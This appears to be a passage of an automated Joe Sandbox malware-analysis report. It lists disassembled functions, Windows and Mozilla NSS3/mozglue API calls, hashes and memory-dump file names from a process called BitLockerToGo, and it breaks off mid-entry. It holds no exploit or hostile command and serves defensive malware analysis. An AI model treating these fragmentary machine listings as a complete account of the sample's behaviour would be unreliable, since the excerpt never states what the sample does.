                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 786543732-0
                                                                                                                                                      • Opcode ID: c74e68b15c75774cd0b1e0045603b920277c0de57049bd8fff9177d53b77cd8f
                                                                                                                                                      • Instruction ID: 98819ec4f3477a383182b38f9d4a297b00db78380d134d2e9a9c754389587610
                                                                                                                                                      • Opcode Fuzzy Hash: c74e68b15c75774cd0b1e0045603b920277c0de57049bd8fff9177d53b77cd8f
                                                                                                                                                      • Instruction Fuzzy Hash: 5251D375F002269BDF01DF68CC416BE77B8BB16349F148129D908A7B00DB34E946CBE6
                                                                                                                                                      APIs
                                                                                                                                                      • sqlite3_value_text16.NSS3(?), ref: 6C9E4CAF
                                                                                                                                                      • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C9E4CFD
                                                                                                                                                      • sqlite3_value_text16.NSS3(?), ref: 6C9E4D44
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                      • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                      • API String ID: 2274617401-4033235608
                                                                                                                                                      • Opcode ID: 0fd46276a0103f8e667f7e66c152c70a54f73021fc5ff6a1a777a77cd1f9faf1
                                                                                                                                                      • Instruction ID: 4585913df9e4db68cb5bded65cbe903f5dbf6678a1d9bc518d9af8b02119dce3
                                                                                                                                                      • Opcode Fuzzy Hash: 0fd46276a0103f8e667f7e66c152c70a54f73021fc5ff6a1a777a77cd1f9faf1
                                                                                                                                                      • Instruction Fuzzy Hash: 32317AB2F04921A7D70B46A898007E4737ABFAE318F154139D4254BE15C725FCA28FE2
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                        • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                        • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                        • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C83EC84
                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83EC8C
                                                                                                                                                        • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                        • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C83ECA1
                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83ECAE
                                                                                                                                                      • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C83ECC5
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83ED0A
                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C83ED19
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 6C83ED28
                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C83ED2F
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83ED59
                                                                                                                                                      Strings
                                                                                                                                                      • [I %d/%d] profiler_ensure_started, xrefs: 6C83EC94
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                      • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                      • API String ID: 4057186437-125001283
                                                                                                                                                      • Opcode ID: 913337816c3f50dab1b4d75b6714727e0042f1f1ae76564badcc67b6ec143ec4
                                                                                                                                                      • Instruction ID: 406344891564b9da85307de5a3a154a87272c1512662dcd38a8543ff896f4727
                                                                                                                                                      • Opcode Fuzzy Hash: 913337816c3f50dab1b4d75b6714727e0042f1f1ae76564badcc67b6ec143ec4
                                                                                                                                                      • Instruction Fuzzy Hash: 6221D2716001289BDB329FA9DA0CAAF377AEB4526DF105A30F91897740EB359C15CBF1
                                                                                                                                                      APIs
                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C9E2D9F
                                                                                                                                                        • Part of subcall function 6C89CA30: EnterCriticalSection.KERNEL32(?,?,?,6C8FF9C9,?,6C8FF4DA,6C8FF9C9,?,?,6C8C369A), ref: 6C89CA7A
                                                                                                                                                        • Part of subcall function 6C89CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C89CB26
                                                                                                                                                      • sqlite3_exec.NSS3(?,?,6C9E2F70,?,?), ref: 6C9E2DF9
                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C9E2E2C
                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C9E2E3A
                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C9E2E52
                                                                                                                                                      • sqlite3_mprintf.NSS3(6CA4AAF9,?), ref: 6C9E2E62
                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C9E2E70
                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C9E2E89
                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C9E2EBB
                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C9E2ECB
                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C9E2F3E
                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C9E2F4C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1957633107-0
                                                                                                                                                      • Opcode ID: 3f19fa329ad9db09bc531cb9f3168f519b53989aee39e668ade8ede01002d580
                                                                                                                                                      • Instruction ID: fca61cc908c2657725337955cac2f9de2d4673a3ccc5613e26e6fad7882d70d8
                                                                                                                                                      • Opcode Fuzzy Hash: 3f19fa329ad9db09bc531cb9f3168f519b53989aee39e668ade8ede01002d580
                                                                                                                                                      • Instruction Fuzzy Hash: 8861ADB5E006168BEB11CFA8D884B9EB7B5BF68348F144428DD05AB701E731E855CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32(6C933F23,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C62
                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C76
                                                                                                                                                      • PL_HashTableLookup.NSS3(00000000,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C86
                                                                                                                                                      • PR_Unlock.NSS3(00000000,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932C93
                                                                                                                                                        • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                        • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932CC6
                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23,?), ref: 6C932CDA
                                                                                                                                                      • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?,?,6C933F23), ref: 6C932CEA
                                                                                                                                                      • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?), ref: 6C932CF7
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C92E477,?,?,?,00000001,00000000,?), ref: 6C932D4D
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C932D61
                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?), ref: 6C932D71
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C932D7E
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007AD
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007CD
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C89204A), ref: 6C9007D6
                                                                                                                                                        • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C89204A), ref: 6C9007E4
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,6C89204A), ref: 6C900864
                                                                                                                                                        • Part of subcall function 6C9007A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C900880
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsSetValue.KERNEL32(00000000,?,?,6C89204A), ref: 6C9008CB
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008D7
                                                                                                                                                        • Part of subcall function 6C9007A0: TlsGetValue.KERNEL32(?,?,6C89204A), ref: 6C9008FB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2446853827-0
                                                                                                                                                      • Opcode ID: d1cfa98df2323adfcff1928f538567be42dfa4fd4b88b412445b04481ac012b9
                                                                                                                                                      • Instruction ID: 0b7c01744b268d10513facc57e7e92102d1f3b2c80b8cc4767d1944588669266
                                                                                                                                                      • Opcode Fuzzy Hash: d1cfa98df2323adfcff1928f538567be42dfa4fd4b88b412445b04481ac012b9
                                                                                                                                                      • Instruction Fuzzy Hash: C85115B6D00615ABDB01AF24DC458AA77B8FF2931CB048524ED1C97B12E731E965CBE1
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894C97
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CB0
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CC9
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D11
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D2A
                                                                                                                                                      • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D4A
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D57
                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894D97
                                                                                                                                                      • PR_Lock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894DBA
                                                                                                                                                      • PR_WaitCondVar.NSS3 ref: 6C894DD4
                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894DE6
                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894DEF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3388019835-0
                                                                                                                                                      • Opcode ID: f2162320456d24d45ff6211bcab81afb047865ebb7da6c99d76acdb49777d99b
                                                                                                                                                      • Instruction ID: 7f0a571caa8fec9c32e7f716f7d66e677e79da1385f01f834efd29d804aca141
                                                                                                                                                      • Opcode Fuzzy Hash: f2162320456d24d45ff6211bcab81afb047865ebb7da6c99d76acdb49777d99b
                                                                                                                                                      • Instruction Fuzzy Hash: A041B4B9A04716CFCF15AF7CC5941697BF0BF86319F068A29D89897B10E730D885CB91
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F3492
                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F34A9
                                                                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F34EF
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C7F350E
                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C7F3522
                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C7F3552
                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F357C
                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C7F3592
                                                                                                                                                        • Part of subcall function 6C82AB89: EnterCriticalSection.KERNEL32(6C87E370,?,?,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284), ref: 6C82AB94
                                                                                                                                                        • Part of subcall function 6C82AB89: LeaveCriticalSection.KERNEL32(6C87E370,?,6C7F34DE,6C87F6CC,?,?,?,?,?,?,?,6C7F3284,?,?,6C8156F6), ref: 6C82ABD1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                      • API String ID: 3634367004-706389432
                                                                                                                                                      • Opcode ID: e1ff93cd942d837ee5a2ccc8015f424a228819c580b885dcf11abe2333de5aea
                                                                                                                                                      • Instruction ID: c9520bf31992126ec0864cdd9f5aa2fa3a5d6f46aed89e0d90df8b6ffdb1e817
                                                                                                                                                      • Opcode Fuzzy Hash: e1ff93cd942d837ee5a2ccc8015f424a228819c580b885dcf11abe2333de5aea
                                                                                                                                                      • Instruction Fuzzy Hash: 18318171B001159BDF21DBB9CA8CAAE77B5FB96308F100439E515A3750F774A905CBB1
                                                                                                                                                      APIs
                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C95DE64), ref: 6C95ED0C
                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C95ED22
                                                                                                                                                        • Part of subcall function 6C96B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA418D0,?), ref: 6C96B095
                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C95ED4A
                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C95ED6B
                                                                                                                                                      • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C95ED38
                                                                                                                                                        • Part of subcall function 6C894C70: TlsGetValue.KERNEL32(?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894C97
                                                                                                                                                        • Part of subcall function 6C894C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CB0
                                                                                                                                                        • Part of subcall function 6C894C70: PR_Unlock.NSS3(?,?,?,?,?,6C893921,6CA714E4,6C9DCC70), ref: 6C894CC9
                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?), ref: 6C95ED52
                                                                                                                                                      • PR_CallOnce.NSS3(6CA72AA4,6C9712D0), ref: 6C95ED83
                                                                                                                                                      • PL_FreeArenaPool.NSS3(?), ref: 6C95ED95
                                                                                                                                                      • PL_FinishArenaPool.NSS3(?), ref: 6C95ED9D
                                                                                                                                                        • Part of subcall function 6C9764F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C97127C,00000000,00000000,00000000), ref: 6C97650E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                      • String ID: security
                                                                                                                                                      • API String ID: 3323615905-3315324353
                                                                                                                                                      • Opcode ID: 7d85ad63e5b4e8ca8c7424e365b322e71cdd10bd3102e455a240c87bffbe4560
                                                                                                                                                      • Instruction ID: bfa1b06bd8d8f0a21c013e0a5d9a45a32005c385287d52fe949c8a4c90b61187
                                                                                                                                                      • Opcode Fuzzy Hash: 7d85ad63e5b4e8ca8c7424e365b322e71cdd10bd3102e455a240c87bffbe4560
                                                                                                                                                      • Instruction Fuzzy Hash: 68116D359012186BEB209A25AC44FBB737CBF6160CF454534E85462E41F72AE52CC6F6
                                                                                                                                                      APIs
                                                                                                                                                      • PR_LogPrint.NSS3(Aborting,?,6C902357), ref: 6CA20EB8
                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C902357), ref: 6CA20EC0
                                                                                                                                                      • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CA20EE6
                                                                                                                                                        • Part of subcall function 6CA209D0: PR_Now.NSS3 ref: 6CA20A22
                                                                                                                                                        • Part of subcall function 6CA209D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CA20A35
                                                                                                                                                        • Part of subcall function 6CA209D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CA20A66
                                                                                                                                                        • Part of subcall function 6CA209D0: PR_GetCurrentThread.NSS3 ref: 6CA20A70
                                                                                                                                                        • Part of subcall function 6CA209D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CA20A9D
                                                                                                                                                        • Part of subcall function 6CA209D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CA20AC8
                                                                                                                                                        • Part of subcall function 6CA209D0: PR_vsmprintf.NSS3(?,?), ref: 6CA20AE8
                                                                                                                                                        • Part of subcall function 6CA209D0: EnterCriticalSection.KERNEL32(?), ref: 6CA20B19
                                                                                                                                                        • Part of subcall function 6CA209D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA20B48
                                                                                                                                                        • Part of subcall function 6CA209D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA20C76
                                                                                                                                                        • Part of subcall function 6CA209D0: PR_LogFlush.NSS3 ref: 6CA20C7E
                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CA20EFA
                                                                                                                                                        • Part of subcall function 6C90AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C90AF0E
                                                                                                                                                      • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CA20F16
                                                                                                                                                      • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CA20F1C
                                                                                                                                                      • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CA20F25
                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CA20F2B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
